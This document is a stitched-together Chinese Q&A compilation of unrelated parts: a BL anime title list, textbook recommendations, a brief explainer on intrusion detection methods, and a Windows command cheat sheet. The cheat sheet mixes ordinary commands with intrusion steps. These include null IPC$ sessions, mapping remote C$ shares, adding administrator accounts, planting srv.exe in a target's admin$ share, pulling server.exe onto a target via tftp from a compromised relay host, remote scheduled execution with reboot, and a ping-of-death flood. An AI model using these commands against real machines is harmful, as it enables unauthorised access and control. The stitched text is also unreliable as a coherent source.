200分找目前来说最全的BL动画目录
A:《爱的挑战者(合格祈愿)》(高永雏子)
《暗之末裔》 (松下容子)
《爱是如此神奇》 (铃木リマ )
《爱做梦的小孩 》 (桑原水菜)
《暧昧的绿色》 (成神户)
B:《冰之魔物语》 (杉浦志保)
《臂弯里的天堂鸟》 (户川视友)
《绊》 (小鹰和麻)
《BL学院》 (氷栗优)
《笨拙的沉默》(高永雏子)
《百日蔷薇》(稻荷家房之介)
C:《传说中的精灵天使》 (富士春美)
《春风物语》 (大矢和美)
《长距离恋爱的孤独》 (叶芝真己)
《丛林男孩》 (中村理惠)
《纯爱1/2手册》 (韩秀莲)(韩国)
《纯情罗曼史》 (中村春菊)
《沉溺在爱中/与君共溺爱河/きみが恋に溺れる》 (高永雏子)
D:《东京巴比伦》 (clamp)
《Double Call》 (绯色零一)
《独占欲》 (尾崎南)
《纽约纽约》 (罗川真里茂)
《毒伯爵该隐》 (由贵香织里)
《东京来的密码情人》 (水城雪可奈 )
《断袖》 (爱弥尔)
E:《恶之月》 (伊藤结花理)
F:《梵天变》 (高永)
《FAKE》 (真东砂波)
《粉红漫画家》 (高口里纯)
《腐败教师方程式》 (小鹰和麻)
G:《GAME游戏》 (今市子)
《高危险游戏》 (叶芝真己)
《钢琴师的情人》 (大和名濑)
《兄贵上等》 (鹿乃西子)
《灌篮高手番外篇》
《关于我的初恋》
H:《HOLD UP》 (岛田尚朱)
《合法禁药》 (clamp)
《海老原家热闹滚滚》 (东宫千子)
《火王》 (游素兰)
《火宵之月》 (平井摩利)
《海上迷情》 (绯色零一)
《花降楼》(树要)
《花阴-堕ちた蜜华-》
《蝴蝶》 (高永雏子)
《灰姑娘男孩的至爱》 (杉浦志保)
《黑塔利亚》
《黑执事》(枢梁)(暧昧类型...)
I:《LOVE MODE》(志水雪)
J:《JANE》 (桔水树and樱林)
《绝爱》 (尾崎南)
《间之楔》
《禁忌游戏》
《骄阳下的玻璃恋人》 (叶芝真己)
《吉祥寺物语》 (户川视友)
《今天开始变魔王》
K:《KIZUNA》 (又名激爱,小鹰和麻)
《快感方程式》 (葵二叶红三叶)
L:《LOVELESS》 (高河ゆん)
《LOVE MODE》 (志水雪)
《LOVE ME》
《凛》 (穗波雪乃)
《绿丛中的危险关系》 (藤原巧 )
《恋爱中毒的仙术师》 (川添真理子)
《落花飘羽双生缘》 (阿部美幸)
《雷兹莉亚》 (天城小百合)
《恋梦成真花绽开》 (铃木リマ )
《恋爱不等式》(高永雏子)
《恋爱暴君》(高永雏子)
M:《MOTTO》 (内田一菜)
《美男子的亲密爱人》 (叶芝真已)
《迷途的羔羊》 (北里千寿)
《魔道奏鸣曲》 (天城小百合)
《魔法甜心杰克》 (藤臣花恋)
《你是我一生的真爱》 (小田切***) !
《每日晴天》 (画:二宫悦已、原:菅野彰)
《明星的同居生活》 (香住凉和)
《魔道奏鸣曲》 (天城小百合)
《秘密》 (春野真美)
《玫瑰花丛的依恋》 (吉永史)
《明明白白一颗心》 (阿部美幸)
《迷乱反射》 (石堂摩有)
《漫画家的真情指数》 (东宫千子)
《明色青春的爱恋》 (东宫千子)
N:《逆光下的真情狂爱》 (朝雾夕)
《你是我一生的珍爱》 (小田切ほたる)
《浓情巧克力》(高永雏子)
Q:《全部都是爱的错》 (小田切ほたる)
《蔷薇天使恋》 (冰粟优)
《前世今生》 (高城可奈)
《情人总敲三下门》 (朝雾夕)
《青春激情少年爱》 (有那寿实 )
《请你倾听我的心跳》 (藤臣花恋)
《请为我微笑》 (藤臣花恋)
R:《仁兽芳烈传》 (森本秀)
《人间俱乐部》 (寺馆和子)
S:《圣传》 (clamp)
《私立荒矶高等学校生徒会执行部》 (峰仓和也)
《少年残像》 (由贵香织里)
《是-ZE-》(志水雪)
《帅哥海盗》 (冰粟优)
《世纪末的达令》 (朝雾夕)
《上海夜未眠》 (水城)
《圣恋.希望之花》 (户川视友)
《神秘国度之人》 (朝雾夕)
《世纪末叛逆天使》 (阿部美幸)
《沈沈深眸赤子情》 (杉浦志保)
《撒旦情人》 (内田一奈)
《神狱》 (高口里纯)
《St Men's cafe》 (冲麻实也)
《世界第一的初恋》 (中村春菊)
《四圣兽》
《神幻拍档》
T:《天国之音》 (远东显)
《天之爱,地之恋》
《体温的距离》 (北川拓也)
《同栖爱》 (水城雪可奈)
《提琴之恋》 (水城雪可奈)
《天堂的忧郁》 (红二叶***)
《天旋地转爱一生》 (阿部美幸)
《天子捎来的福音》 (户川视友)
《THE LASTCLIENT》 (高屿上总)
W:《WELD ADAPTER》 (峰仓和也)
《网球王子》 (许斐刚)
《微热纯爱少年样》 (阿部美幸)
《微忧青春日记》 (阿部美幸)
《万有引力》 (村上真纪)
《网中鱼》
《危险关系症候群》 (冲麻实也)
《午夜太阳》 (有那寿实 )
《我们的王国》 (高岛奈月)
《我的亲亲老爸》 (高口里纯)
《午夜茱丽叶》 (保利安南弥七)
《无敌美少年》 (栗栖ひとみ)
《我永远的恋人》 (吉永史)
《微热革命》 (穗波雪乃)
《危险双胞胎》 (高口里纯)
《王朝春宵》 (原:秋月扣、画:唯月一)
《Winter Water Boys》 (森平夏生)
《无法逃离的背叛》
X:《X战记》 (clamp)
《邪道》 (冲麻实也)
《幸运男子》 (高口里纯)
《西方终结处》 (红二叶***)
《向满月絮语》 (真东砂泼)
《西洋古董洋果子店》 (吉永史)
《心的连线》 (檀华兰)
《吸血情人》 (CHI-RAN)
《校园受训记》 (九条菜里)
《星期恋人》(宝井理人)
《学生会长的忠告》
《喜欢就是喜欢》
Y: 《原兽文书》 (成岛百合)
《月华佳人》 (押上美猫)
《银之勇者》 (渡边祥智)
《妖魔的封印》 (叶月信)
《颜色》(藏王大志)
《银色风拂纱梦》 (小田切ほたる )
《意外的单身生活》 (佑也)
《拥抱你的感觉真好》 (加山弓)
《拥抱我的漫画情人》 (川原未夜)
《一九九九上海夜未眠》 (水城雪可奈)
《与郎共枕》 (东宫千子)
《永世情人的春天》 (远东显)
《与君共圆南国梦》 (户川视友)
《异帮人》 (小鹰和麻)
《绝色的欲望城市》 (新田佑克)
《与你共坠爱河 きみが恋に堕ちる》(君恋系列1)(高永雏子)
Z:《最游记》 (峰仓和也)
《最游记外传》 (峰仓和也)
《战栗情人不设防》 (森本秀)
《再爱一次》 (神部晶)
《中华物语之纯爱路线》 (水上新)
《仲夏夜恋人游戏》 (画:小出美惠子、原秋月)
《指环物语》(小田切萤)
《战国BASARA》
3:《3D BOY》 (内田一奈)
求推荐各个行业的专业教科书
1. 师从天才 作者 : [美] 罗伯特·卡尼格尔
出版社 : 上海科技教育出版社
2. 普通生物学
作者 : 陈阅增
出版社 : 高等教育出版社
3. 什么是数学
作者 : [美] R·柯朗 H·罗宾 著/I·斯图尔特 修订
出版社 : 复旦大学出版社
4. 病者生存
作者 : (美)莫勒姆,(美)普林斯 著,邵毓敏 译
出版社 : 广西科学技术出版社
5. 物理世界奇遇记
作者 : (美)伽莫夫/(英)斯坦纳德
出版社 : 科学出版社
6. 追寻记忆的痕迹
作者 : [美] 埃里克·坎德尔
出版社 : 中国轻工业出版社
7. 梦断代码
作者 : Scott Rosenberg
出版社 : 电子工业出版社
8. 编码的奥秘
作者 : Charles Petzold/伍卫国/王宣政/孙燕妮
出版社 : 机械工业出版社
9. 大众天文学(上下两册)
作者 : C.弗拉马里翁
出版社 : 广西师范大学出版社
10. 费恩曼物理学讲义(第1卷)
作者 : Richard P. Feynman/Robert B. Leighton/Matthew Sands
出版社 : 上海科学技术出版社
11. 环境科学:全球关注 上下
作者 : 库宁汉姆
出版社 : 科学出版社
12. 最大的小发明:螺丝与螺丝刀
作者 : 里布金斯基 出版社 : 百花文艺出版社
13. 世界科学技术通史
作者 : 麦克莱伦第三
出版社 : 上海科技教育出版社
14. 建筑空间组合论(第三版)
作者 : 彭一刚 著
出版社 : 中国建筑工业出版社
15. 《华尔街日报》是如何讲故事的
作者 : [美] 威廉·E.布隆代尔
出版社 : 华夏出版社
16. 诤语良言:与青年记者谈新闻写作
作者 : 刘其中
出版社 : 新华出版社
17. 法律之门
作者 : [美] 博西格诺
出版社 : 华夏出版社
18. 心理学与生活
作者 : [美] 理查德·格里格/菲利普·津巴多
出版社 : 人民邮电出版社
19. 登天的感觉:我在哈佛大学做心理咨询(修订本) (平装)
作者 : 岳晓东
出版社 : 上海人民出版社
20. 实验心理学通过实例入门(第7版)
作者 : 索尔索
出版社 : 中国轻工业出版社
21. Lehninger生物化学原理(第3版)
作者 : David L.Nelson/Michael M.Cox
出版社 : 高等教育出版社
22. 思维的版图
作者 : 理查德.尼斯贝特
出版社 : 中信出版社
23. 社会心理学(第8版)
作者 : [美] 戴维·迈尔斯
出版社 : 人民邮电出版社
24. 与“众”不同的心理学
作者 : Keith E.Stanovich
出版社 : 中国轻工业出版社
25. 所罗门王的指环-劳伦兹动物行为学著作系列
作者 : (奥)劳伦兹
出版社 : 中国和平出版社
26. 信息时代的儿童发展
作者 : 桑德拉·L.卡尔弗特
出版社 : 商务印书馆
27. 人工智能的未来
作者 : Jeff Hawkins/Sandra Blakeslee
出版社 : 陕西科学技术出版社
评语 : 人工智能方面的推荐
28. 花的智慧
作者 : (比)莫里斯·梅特林克
出版社 : 漓江出版社
29. 外部空间设计
作者 : 芦原义信
出版社 : 中国建筑工业出版社
30. 清洁与高雅-浴室和水厕趣史
作者 : [英]劳伦斯·赖特
出版社 : 商务印书馆
31. 蒙面骑士
作者 : (墨)马科斯
出版社 : 上海人民出版社
32. 理解航天:航天学入门
作者 : (美)塞勃
出版社 : 清华大学出版社
33. 改变世界的方程:牛顿、爱因斯坦和相对论
作者 : (德)弗里奇
出版社 : 上海科技教育出版社
34. 语言本能
作者 : (美)史迪芬.平克
出版社 : 汕头大学出版社
35. 一个广告人的自白
作者 : 大卫·奥格威
出版社 : 中信出版社
36. 超越CSS
作者 : Andy Clarke
出版社 : 人民邮电出版社
37. 相同与不同
作者 : 洛德·霍夫曼
出版社 : 吉林人民出版社
38. 美国大城市的死与生(纪念版)
作者 : [加拿大] 简·雅各布斯
出版社 : 译林出版社
39. 古典作曲家排行榜
作者 : 菲尔.G.古尔丁
出版社 : 海南出版社
40. 离散数学及其应用
作者 : (美)罗森 著,袁崇义 等译
出版社 : 机械工业出版社
41. 博弈论基础
作者 : 高峰 罗伯特·吉本斯
出版社 : 中国社会科学出版社
42. 计算机网络
作者 : Andrew S. Tanenbaum
出版社 : 清华大学出版社
43. 全球化下的社会变迁与非政府组织(NGO)
作者 : 范丽珠
出版社 : 上海人民出版社
44. 安藤忠雄连战连败
作者 : (日)安藤忠雄
出版社 : 中国建筑工业出版社
45. Kirklin/Barratt-Boyes心脏外科学两卷套(第3版) Kirklin/Barratt-Boyes Cardiac Surgery
作者 : Nicholas Kouchoukos 著
出版社 : Oversea Publishing House
46. 综合评价理论、方法及应用
作者 : 郭亚军
出版社 : 科学出版社
47. 机械设计手册.单行本.机械振动·机架设计
作者 : 成大先
出版社 : 化学工业出版社
48. 普通地质学简明教程
作者 : 杨伦
出版社 : 中国地质大学出版社
49. 艺术的故事
作者 : [英] 贡布里希 (Sir E.H.Gombrich)
出版社 : 广西美术出版社
50. 工程热力学
作者 : 曾丹苓
出版社 : 高等教育出版社
51. 如何求解问题:现代启发式方法
作者 : Zbigniew Michalewicz/David B.Fogel
出版社 : 中国水利水电出版社
52. Head First Object-Oriented Analysis and Design
作者 : Brett D. McLaughlin/Gary Pollice/Dave West
出版社 : O'Reilly Media
53. 原动画基础教程
作者 : 威廉姆斯
出版社 : 中国青年出版社
54. 测绘学概论(第二版)
作者 : 宁津生,陈俊勇,李德仁,刘经南,张祖勋 等编著
出版社 : 武汉大学出版社
55. 风景园林设计要素
作者 : 诺曼K.布思
出版社 : 中国林业出版社
56. 计算流体力学基础及其应用
作者 : (美)约翰D.安德森(JohnD.Anderson) 著,吴颂平,刘赵森 译
出版社 : 机械工业出版社
57. 历届CMO中国数学奥林匹克试题集1986-2009
作者 : 刘北兴
出版社 : 哈尔滨工业大学出版社
59. 训诂学(修订本)
作者 : 郭在贻
出版社 : 中华书局
60. 搏击沧海――地学革命风云录(第二版)
作者 : (瑞士)许靖华 著
出版社 : 地质出版社 评语 : 地球科学
61. 机器学习
作者 : (美)米歇尔(Mitchell,T.M.) 著;曾华军 等译
出版社 : 机械工业出版社
62. 从一到无穷大
作者 : [美] G. 伽莫夫
出版社 : 科学出版社
63. 统计学的世界(第五版)
作者 : David S. Moore/William I. Notz
出版社 : 中信出版社
64. 创世纪的第八天:20世纪分子生物学革命
作者 : 霍勒斯・贾德森/李晓丹
出版社 : 上海科学技术出版社
65. 埃及考古学
作者 : 刘文鹏
出版社 : 生活·读书·新知三联书店
66. 灵魂机器的时代:当计算机超过人类智能时
作者 : (美)库兹韦尔/Ray Kurzweil
出版社 : 上海译文出版社
67. 文化人类学
作者 : 威廉·A·哈维兰
出版社 : 上海社会科学院出版社
68. 双螺旋
作者 : [美] J. D. 沃森
出版社 : 科学出版社
69. 叔本华的治疗
作者 : 欧文·亚龙
出版社 : 希望出版社
70. 金枝(上下册)
作者 : [英] J.G.弗雷泽
出版社 : 新世界出版社
73. 女士品茶:20世纪统计怎样变革了科学
作者 : 萨尔斯伯格 (SalsburgDavid)
出版社 : 中国统计出版社
74. 海洋科学导论
作者 : 冯士筰 等主编
出版社 : 高等教育出版社
75. 上帝掷骰子吗▪量子物理史话
作者: 曹天元
出版社: 辽宁教育出版社
76. 古今数学思想
作者: [美] 莫里斯•克莱因
译者: 张理京 / 张锦炎 / 江泽涵
出版社: 上海科学技术出版社
77. 数学——它的内容、方法和意义
作者: А.Д.亚历山大洛夫
译者: 孙小礼 / 赵孟养 / 裘光明 / 严士健
出版社: 科学出版社
78. 初等数论
作者:潘承洞,潘承彪
出版社: 北京大学出版社
79. 经济学原理
作者: [美] N.格里高利•曼昆;译者: 梁小民 / 梁砾
出版社: 北京大学出版社
80. 牛奶可乐经济学(已读)
作者: [美] 罗伯特•弗兰克;译者: 闾佳
出版社: 中国人民大学出版社
81. 如何成为顶级记者
作者: 杰里•施瓦茨
译者: 曹俊等
出版社: 中央编译出版社
82. 魔鬼经济学
作者: [美] 史蒂芬•列维特 / [美] 史蒂芬•都伯纳;译者: 刘祥亚
出版社: 广东经济出版社
83. 中国古代神话
作者: 袁珂
出版社: 华夏出版社
84. 法理学:法律哲学和法律方法
作者: E•博登海默
译者: 邓正来
出版社: 中国政法大学出版社
85. 万历十五年
作者: [美] 黄仁宇
出版社: 生活•读书•新知三联书店
86. 生命是什么
作者: [奥]埃尔温•薛定谔
译者: 罗来欧/ 罗辽复
出版社: 湖南科学技术出版社
87. 大问题
作者: [美] 罗伯特•所罗门
出版社: 广西师范大学出版社
88. 社会学的想象力
作者: (美)米尔斯
出版社: 三联书店
89. 日语概说
作者: 金田一春彦
出版社: 北京大学出版社
90. 菊与刀
作者: 鲁思•本尼迪克特
出版社: 武汉出版社
91. 万物简史
作者: [美] 比尔•布莱森
出版社: 接力出版社
92. 世界科学技术通史
作者: 麦克莱伦第三
出版社: 上海科技教育出版社
93. 苏菲的世界
作者: (挪威)乔斯坦•贾德
出版社: 作家出版社专业:哲学
94. 电影剪辑技巧
作者: 米勒
出版社: 中国电影
95. 电影批评
作者: 戴锦华
出版社: 北京大学出版社
96. 涂尔干死了
作者: [美]阿瑟•阿萨•伯格
出版社: 广西师范大学出版社
97. 中国鸟类野外手册
作者: [主编][英]约翰•马敬能(John MacKinnon) / [绘图]卡伦•菲利普斯(Karen Phillipps)
出版社: 湖南教育出版社
98. 材料科学与工程基础(影印版)
作者: 阿斯克兰德
出版社: 清华大学
99. 一个广告人的自白
作者: (美)奥格威;译者: 林桦
出版社: 中国物价出版社
100. 昆虫记
作者: J.-H.法布尔 / 王光;译者: 王光
出版社: 作家出版社
101. 花朵的秘密生命
作者: 萝赛;译者: 钟友珊
出版社: 广西师范大学出版社
102. 阿西莫夫最新科学指南(上下册)
作者: [美] 阿西莫夫;译者: 朱岚 [等]
出版社: 江苏人民出版社
103. 图解思考
作者: [美] 保罗•拉索;译者: 邱贤丰 / 刘宇光 / 郭建青
出版社: 中国建筑工业出版社
104. 资治通鉴(柏杨白话版)
作者: 司马光
出版社: 北岳文艺出版社
105. 华夏意匠
作者: 李允鉌
出版社: 天津大学出版社
106. 蔚蓝诡计
作者: (美)乔治•路易斯(George Lois) / (美)比尔•匹兹(Bill Pitts);译者: 刘家驯
出版社: 海南 出版社
107. 材料科学基础
作者: 胡赓祥
出版社: 上海交大
108. learn python the hard way
作者: Zed Shaw
出版社:
109. 法意3000年
作者: 赵明
出版社: 中国法律图书有限公司
110. 西西弗的神话
作者: [法] 加缪
译者: 杜小真
出版社: 广西师范大学出版社
111. 医学史十五讲
作者: 江晓原
出版社: 北京大学
112. 数学分析
作者: [美]Tom M. Apostol
译者: 邢富冲 / 邢辰 / 李松洁 / 贾婉丽
出版社: 机械工业出版社
113. 动物生理学
作者: 陈守良
出版社: 高等教育出版社
114. 爱的艺术
作者: [美] 艾•弗洛姆;译者: 李健鸣
出版社: 上海译文出版社
115. 给教师的建议
作者: [苏] B.A. 苏霍姆林斯基;译者: 杜殿坤 编译
出版社: 教育科学出版社
116. 西方幻想文学论
作者: 彭懿
出版社: 少年儿童出版社
117. 全球导航卫星定位系统原理与应用
作者: 成英燕
出版社: 测绘
118. 深入理解计算机系统
作者: Randal E.Bryant / David O'Hallaron;译者: 龚奕利 / 雷迎春
出版社: 中国电力
119. 化学史传--化学史与化家传
作者: 山冈 望(日);译者: 廖正衡/等
出版社: 商务印书馆
120. Perl语言入门
作者: (美)斯库渔产茨 等
译者: 李晓峰
出版社: 中国电力出版社
121. 《黑暗历史现场》系列丛书(共14本)
作者: 狄利;译者: 苏海霞
出版社: 中州古籍
122. 微积分
作者: [美]D.休斯.哈雷特,A.M.克莱逊
译者: 胡乃冏 邵勇 徐可 马志鹏 徐刚
出版社: 高等教育出版社
123. 学习Web设计
作者: (美)Jennifer Niederst Robbins;译者: 靳志伟
出版社:机械工业出版社
124. 牛津英语用法指南
作者: Michael Swan;译者: 严维明、庄绎传等
出版社: 外语教学与研究出版社
125. 心理学带你走出思维误区
作者:(美)罗斯科 著 王湘,李欢欢 译
出 版 社:华东师范大学出版社
126. 建筑:形式、空间和秩序
作者: 弗朗西斯•D.K.钦;译者: 邹德侬 / 方千里
出版社: 中国建筑工业出版社
127. 现代建筑:一部批判的历史
作者: (美)肯尼斯•弗兰姆普敦;译者: 张钦楠
出版社: 三联书店
128. 现代汉语八百词
作者: 吕叔湘
出版社: 商务印书馆
129. 文学理论入门
作者: Jonathan Culler;译者: 李平
出版社: 译林出版社
130. 粒子物理和场论
作者: 李政道
出版社: 上海科学技术
131. 黑客与画家
作者: [美] Paul Graham;译者: 阮一峰
出版社: 人民邮电出版社
132. essential of biology
作者: Bye, Eric A. (EDT)
出版社: Barrons Educational Series Inc
133. at the bench-a laboratory navigato
作者: Kathy Barker
出版社: Cold Spring Harbor Laboratory Press
134. 故事——材质、结构、风格和银幕剧作的原理
作者: [美] 罗伯特•麦基;译者: 周铁东
出版社: 中国电影出版社
135. 影视语言教程
作者: 李稚田
出版社: 北京师范大学出版社
136. 当代文艺心理学
作者:金元浦 主编
出版社:中国人民大学出版社
137. 编程珠玑
作者: Jon Bentley;译者: 黄倩 / 钱丽艳
出版社: 人民邮电出版社
138. 程序设计实践
作者: [美] Brian W. Kernighan / Rob Pike;译者: 裘宗燕
出版社: 机械工业出版社
139. 具体数学
作者: [美] Ronald L. Graham / Donald E. Knuth / Oren Patashnik
出版社: 机械工业出版社
140. 哥德尔、艾舍尔、巴赫--集异璧之大成
作者: [美] 侯世达;译者: 郭维德 等
出版社: 商务印书馆
141. 皇帝新
作者: 罗杰•彭罗斯
译者: 许明贤 / 吴忠超
出版社: 湖南科学技术出版社
142. 果壳中的宇宙
译者: 吴忠超
出版社: 湖南科学技术出版社
143. 天真的人类学家
作者: (英) 奈吉尔•巴利(Nigel Barley);译者: 何颖怡
出版社: 广西师范大学出版社
144. Basic Notions of Algebra
作者: Shafarevich
出版社: Springer-Verlag (科学出版社影印引入)
145. 热的简史
作者:姜•范恩(John Fenn)
出版社:东方出版社
146. 神祗•坟墓•学者: 欧洲考古人的故事
作者: [德] C. W. 西拉姆;译者: 刘乃元
出版社: 生活•读书•新知三联书店
147. 电化学方法:原理与应用
作者:[美]巴德(Bard A.J.),福克纳(Faulkner L.R.),等
出版社:化学工业出版社(中文版) JOHN WILEYSONS,INC.(英文版)
148. 新闻理论十讲
作者: 陈力丹
出版社: 复旦大学出版社
149. 传播学纲要
作者: 陈力丹
出版社: 人民大学
简述入侵检测常用的四种方法
入侵检测系统所采用的技术可分为特征检测与异常检测两种。
1、特征检测
特征检测(Signature-based detection) 又称Misuse detection ,这一检测假设入侵者活动可以用一种模式来表示,系统的目标是检测主体活动是否符合这些模式。
它可以将已有的入侵方法检查出来,但对新的入侵方法无能为力。其难点在于如何设计模式既能够表达“入侵”现象又不会将正常的活动包含进来。
2、异常检测
异常检测(Anomaly detection) 的假设是入侵者活动异常于正常主体的活动。根据这一理念建立主体正常活动的“活动简档”,将当前主体的活动状况与“活动简档”相比较,当违反其统计规律时,认为该活动可能是“入侵”行为。
异常检测的难题在于如何建立“活动简档”以及如何设计统计算法,从而不把正常的操作作为“入侵”或忽略真正的“入侵”行为。
扩展资料
入侵分类:
1、基于主机
一般主要使用操作系统的审计、跟踪日志作为数据源,某些也会主动与主机系统进行交互以获得不存在于系统日志中的信息以检测入侵。
这种类型的检测系统不需要额外的硬件.对网络流量不敏感,效率高,能准确定位入侵并及时进行反应,但是占用主机资源,依赖于主机的可靠性,所能检测的攻击类型受限。不能检测网络攻击。
2、基于网络
通过被动地监听网络上传输的原始流量,对获取的网络数据进行处理,从中提取有用的信息,再通过与已知攻击特征相匹配或与正常网络行为原型相比较来识别攻击事件。
此类检测系统不依赖操作系统作为检测资源,可应用于不同的操作系统平台;配置简单,不需要任何特殊的审计和登录机制;可检测协议攻击、特定环境的攻击等多种攻击。
但它只能监视经过本网段的活动,无法得到主机系统的实时状态,精确度较差。大部分入侵检测工具都是基于网络的入侵检测系统。
3、分布式
这种入侵检测系统一般为分布式结构,由多个部件组成,在关键主机上采用主机入侵检测,在网络关键节点上采用网络入侵检测,同时分析来自主机系统的审计日志和来自网络的数据流,判断被保护系统是否受到攻击。
参考资料来源:百度百科-入侵检测
98常用DOS命令
DOS命令字典
net use \\ip\ipc$ " " /user:" " 建立IPC空链接
net use \\ip\ipc$ "密码" /user:"用户名" 建立IPC非空链接
net use h: \\ip\c$ "密码" /user:"用户名" 直接登陆后映射对方C:到本地为H:
net use h: \\ip\c$ 登陆后映射对方C:到本地为H:
net use \\ip\ipc$ /del 删除IPC链接
net use h: /del 删除映射对方到本地的为H:的映射
net user 用户名 密码 /add 建立用户
net user guest /active:yes 激活guest用户
net user 查看有哪些用户
net user 帐户名 查看帐户的属性
net localgroup administrators 用户名 /add 把“用户”添加到管理员中使其具有管理员权限,注意:administrator后加s用复数
net start 查看开启了哪些服务
net start 服务名 开启服务;(如:net start telnet, net start schedule)
net stop 服务名 停止某服务
net time \\目标ip 查看对方时间
net time \\目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息
net view 查看本地局域网内开启了哪些共享
net view \\ip 查看对方局域网内开启了哪些共享
net config 显示系统网络设置
net logoff 断开连接的共享
net pause 服务名 暂停某服务
net send ip "文本信息" 向对方发信息
net ver 局域网内正在使用的网络连接类型和信息
net share 查看本地开启的共享
net share ipc$ 开启ipc$共享
net share ipc$ /del 删除ipc$共享
net share c$ /del 删除C:共享
net user guest 12345 用guest用户登陆后用将密码改为12345
net password 密码 更改系统登陆密码
netstat -a 查看开启了哪些端口,常用netstat -an
netstat -n 查看端口的网络连接情况,常用netstat -an
netstat -v 查看正在进行的工作
netstat -p 协议名 例:netstat -p tcq/ip 查看某协议使用情况(查看tcp/ip协议使用情况)
netstat -s 查看正在使用的所有协议使用情况
nbtstat -A ip 对方136到139其中一个端口开了的话,就可查看对方最近登陆的用户名(03前的为用户名)-注意:参数-A要大写
tracert -参数 ip(或计算机名) 跟踪路由(数据包),参数:“-w数字”用于设置超时间隔。
ping ip(或域名) 向对方主机发送默认大小为32字节的数据,参数:“-l[空格]数据包大小”;“-n发送数据次数”;“-t”指一直ping。
ping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping)
ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址,ipconfig可用参数“/all”显示全部配置信息
tlist -t 以树行列表显示进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内)
kill -F 进程名 加-F参数后强制结束某进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内)
del -F 文件名 加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件,/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。例如“DEL/AR *.*”表示删除当前目录下所有只读文件,“DEL/A-S *.*”表示删除当前目录下除系统文件以外的所有文件
#2 二:
del /S /Q 目录 或用:rmdir /s /Q 目录 /S删除目录及目录下的所有子目录和文件。同时使用参数/Q 可取消删除操作时的系统确认就直接删除。(二个命令作用相同)
move 盘符\路径\要移动的文件名 存放移动文件的路径\移动后文件名 移动文件,用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖
fc one.txt two.txt 3st.txt 对比二个文件并把不同之处输出到3st.txt文件中," "和" " 是重定向命令
at id号 开启已注册的某个计划任务
at /delete 停止所有计划任务,用参数/yes则不需要确认就直接停止
at id号 /delete 停止某个已注册的计划任务
at 查看所有的计划任务
at \\ip time 程序名(或一个命令) /r 在某时间运行对方某程序并重新启动计算机
finger username @host 查看最近有哪些用户登陆
telnet ip 端口 远和登陆服务器,默认端口为23
open ip 连接到IP(属telnet登陆后的命令)
telnet 在本机上直接键入telnet 将进入本机的telnet
copy 路径\文件名1 路径\文件名2 /y 复制文件1到指定的目录为文件2,用参数/y就同时取消确认你要改写一份现存目录文件
copy c:\srv.exe \\ip\admin$ 复制本地c:\srv.exe到对方的admin下
cppy 1st.jpg/b+2st.txt/a 3st.jpg 将2st.txt的内容藏身到1st.jpg中生成3st.jpg新的文件,注:2st.txt文件头要空三排,参数:/b指二进制文件,/a指ASCLL格式文件
copy \\ip\admin$\svv.exe c:\ 或:copy\\ip\admin$\*.* 复制对方admini$共享下的srv.exe文件(所有文件)至本地C:
xcopy 要复制的文件或目录树 目标地址\目录名 复制文件和目录树,用参数/Y将不提示覆盖相同文件
tftp -i 自己IP(用肉机作跳板时这用肉机IP) get server.exe c:\server.exe 登陆后,将“IP”的server.exe下载到目标主机c:\server.exe 参数:-i指以二进制模式传送,如传送exe文件时用,如不加-i 则以ASCII模式(传送文本文件模式)进行传送
tftp -i 对方IP put c:\server.exe 登陆后,上传本地c:\server.exe至主机
ftp ip 端口 用于上传文件至服务器或进行文件操作,默认端口为21。bin指用二进制方式传送(可执行文件进);默认为ASCII格式传送(文本文件时)
route print 显示出IP路由,将主要显示网络地址Network addres,子网掩码Netmask,网关地址Gateway addres,接口地址Interface
arp 查看和处理ARP缓存,ARP是名字解析的意思,负责把一个IP解析成一个物理性的MAC地址。arp -a将显示出全部信息
start 程序名或命令 /max 或/min 新开一个新窗口并最大化(最小化)运行某程序或命令
mem 查看cpu使用情况
attrib 文件名(目录名) 查看某文件(目录)的属性
attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存档,只读,系统,隐藏 属性;用+则是添加为某属性
dir 查看文件,参数:/Q显示文件及目录属系统哪个用户,/T:C显示文件创建时间,/T:A显示文件上次被访问时间,/T:W上次被修改时间
date /t 、 time /t 使用此参数即“DATE/T”、“TIME/T”将只显示当前日期和时间,而不必输入新日期和时间
set 指定环境变量名称=要指派给变量的字符 设置环境变量
set 显示当前所有的环境变量
set p(或其它字符) 显示出当前以字符p(或其它字符)开头的所有环境变量
pause 暂停批处理程序,并显示出:请按任意键继续....
if 在批处理程序中执行条件处理(更多说明见if命令及变量)
goto 标签 将cmd.exe导向到批处理程序中带标签的行(标签必须单独一行,且以冒号打头,例如:“:start”标签)
call 路径\批处理文件名 从批处理程序中调用另一个批处理程序 (更多说明见call /?)
for 对一组文件中的每一个文件执行某个特定命令(更多说明见for命令及变量)
echo on或off 打开或关闭echo,仅用echo不加参数则显示当前echo设置
echo 信息 在屏幕上显示出信息
echo 信息 pass.txt 将"信息"保存到pass.txt文件中
findstr "Hello" aa.txt 在aa.txt文件中寻找字符串hello
find 文件名 查找某文件
title 标题名字 更改CMD窗口标题名字
color 颜色值 设置cmd控制台前景和背景颜色;0=黑、1=蓝、2=绿、3=浅绿、4=红、5=紫、6=黄、7=白、8=灰、9=淡蓝、A=淡绿、B=淡浅绿、C=淡红、D=淡紫、E=淡黄、F=亮白
prompt 名称 更改cmd.exe的显示的命令提示符(把C:\、D:\统一改为:EntSky\ )
#3 三:
ver 在DOS窗口下显示版本信息
winver 弹出一个窗口显示版本信息(内存大小、系统版本、补丁版本、计算机名)
format 盘符 /FS:类型 格式化磁盘,类型:FAT、FAT32、NTFS ,例:Format D: /FS:NTFS
md 目录名 创建目录
replace 源文件 要替换文件的目录 替换文件
ren 原文件名 新文件名 重命名文件名
tree 以树形结构显示出目录,用参数-f 将列出第个文件夹中文件名称
type 文件名 显示文本文件的内容
more 文件名 逐屏显示输出文件
doskey 要锁定的命令=字符
doskey 要解锁命令= 为DOS提供的锁定命令(编辑命令行,重新调用win2k命令,并创建宏)。如:锁定dir命令:doskey dir=entsky (不能用doskey dir=dir);解锁:doskey dir=
taskmgr 调出任务管理器
